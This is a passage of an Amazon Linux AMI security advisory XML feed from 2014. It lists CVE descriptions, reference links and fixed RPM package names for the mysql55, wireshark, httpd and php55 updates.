</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0055" title="" id="CVE-2014-0055" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0077" title="" id="CVE-2014-0077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2309" title="" id="CVE-2014-2309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2523" title="" id="CVE-2014-2523" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.10.37" release="47.135.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.10.37" release="47.135.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.10.37" release="47.135.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="perf" version="3.10.37" release="47.135.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.10.37" release="47.135.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.10.37" release="47.135.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.10.37" release="47.135.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.10.37" release="47.135.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.10.37-47.135.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-329</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-329: medium priority package update for mysql55</title><issued date="2014-04-25 15:48:00" /><updated date="2014-09-18 00:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2440:
Unspecified vulnerability in the MySQL Client component in Oracle MySQL 5.5.36 and earlier and 5.6.16 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
1088197:
CVE-2014-2440 mysql: unspecified vulnerability in MySQL Client subcomponent (CPU April 2014)
CVE-2014-2438:
Unspecified vulnerability in Oracle MySQL Server 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Replication.
1088191:
CVE-2014-2438 mysql: unspecified vulnerability in MySQL server related to Replication subcomponent (CPU April 2014)
CVE-2014-2436:
Unspecified vulnerability in Oracle MySQL Server 5.5.36 and earlier and 5.6.16 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via vectors related to RBR.
1088190:
CVE-2014-2436 mysql: unspecified vulnerability in MySQL server related to RBR subcomponent (CPU April 2014)
CVE-2014-2432:
Unspecified vulnerability in the Oracle MySQL Server component 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Federated.
1088179:
CVE-2014-2432 mysql: unspecified vulnerability in MySQL server related to Federated subcomponent (CPU April 2014)
CVE-2014-2431:
Unspecified vulnerability in Oracle MySQL Server 5.5.36 and earlier and 5.6.16 and earlier allows remote attackers to affect availability via unknown vectors related to Options.
1088146:
CVE-2014-2431 mysql: unspecified vulnerability in MySQL server related to Options subcomponent (CPU April 2014)
CVE-2014-2430:
Unspecified vulnerability in Oracle MySQL Server 5.5.36 and earlier and 5.6.16 and earlier allows remote authenticated users to affect availability via unknown vectors related to Performance Schema.
1088143:
CVE-2014-2430 mysql: unspecified vulnerability in MySQL server related to Performance Schema subcomponent (CPU April 2014)
CVE-2014-2419:
Unspecified vulnerability in Oracle MySQL Server 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition.
1088134:
CVE-2014-2419 mysql: unspecified vulnerability in MySQL server related to Partition subcomponent
CVE-2014-0384:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via vectors related to XML.
1088133:
CVE-2014-0384 mysql: unspecified vulnerability in MySQL server related to XML subcomponent (CPU April 2014)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0384" title="" id="CVE-2014-0384" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2419" title="" id="CVE-2014-2419" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2430" title="" id="CVE-2014-2430" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2431" title="" id="CVE-2014-2431" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2432" title="" id="CVE-2014-2432" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2436" title="" id="CVE-2014-2436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2438" title="" id="CVE-2014-2438" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2440" title="" id="CVE-2014-2440" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-test" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" 
version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-common" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-common-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-common" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-common-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.37" release="1.46.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql55-libs-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.37-1.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-330</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-330: medium priority package update for wireshark</title><issued date="2014-04-25 15:57:00" /><updated date="2014-09-18 00:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2299:
Two flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2014-2283:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-2281:
Two flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2013-7114:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-7112:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-6340:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-6339:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-6338:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-6337:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-6336:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6336" title="" id="CVE-2013-6336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6337" title="" id="CVE-2013-6337" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6338" title="" id="CVE-2013-6338" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6339" title="" id="CVE-2013-6339" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6340" title="" id="CVE-2013-6340" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7112" title="" id="CVE-2013-7112" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7114" title="" id="CVE-2013-7114" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2281" title="" id="CVE-2014-2281" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2283" title="" id="CVE-2014-2283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2299" title="" id="CVE-2014-2299" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0342.html" title="" id="RHSA-2014:0342" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wireshark" version="1.8.10" release="7.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-1.8.10-7.13.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="7.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.8.10-7.13.amzn1.x86_64.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="7.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.8.10-7.13.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" 
release="7.13.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-1.8.10-7.13.amzn1.i686.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="7.13.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.8.10-7.13.amzn1.i686.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="7.13.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-debuginfo-1.8.10-7.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-331</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-331: medium priority package update for httpd</title><issued date="2014-04-25 16:00:00" /><updated date="2014-09-18 00:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0098:
A buffer over-read flaw was found in the httpd mod_log_config module. In configurations where cookie logging is enabled (on Red Hat Enterprise Linux it is disabled by default), a remote attacker could use this flaw to crash the httpd child process via an HTTP request with a malformed cookie header.
CVE-2013-6438:
It was found that the mod_dav module did not correctly strip leading white space from certain elements in a parsed XML. In certain httpd configurations that use the mod_dav module (for example when using the mod_dav_svn module), a remote attacker could send a specially crafted DAV request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the "apache" user.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438" title="" id="CVE-2013-6438" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098" title="" id="CVE-2014-0098" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0370.html" title="" id="RHSA-2014:0370" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd" version="2.2.27" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.27-1.2.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.27" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.27-1.2.amzn1.noarch.rpm</filename></package><package name="httpd-devel" version="2.2.27" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.27-1.2.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.27" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.27-1.2.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.27" release="1.2.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.27-1.2.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.27" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.27-1.2.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.27" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.27-1.2.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.27" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.27-1.2.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.27" release="1.2.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.27-1.2.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.27" 
release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.27-1.2.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.27" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.27-1.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-332</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-332: medium priority package update for php55</title><issued date="2014-04-25 16:01:00" /><updated date="2014-09-18 00:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-7345:
The BEGIN regular expression in the awk script detector in magic/Magdir/commands in file before 5.15 uses multiple wildcards with unlimited repetitions, which allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted ASCII file that triggers a large amount of backtracking, as demonstrated via a file with many newline characters.
1079846:
CVE-2013-7345 file: extensive backtracking in awk rule regular expression
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345" title="" id="CVE-2013-7345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-mbstring" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.11" release="1.71.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package 
name="php55-tidy" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.11" release="1.71.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.11" release="1.71.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-intl-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.11" release="1.71.amzn1" 
epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.11-1.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-333</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-333: medium priority package update for php54</title><issued date="2014-04-25 16:04:00" /><updated date="2014-09-18 00:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-7345:
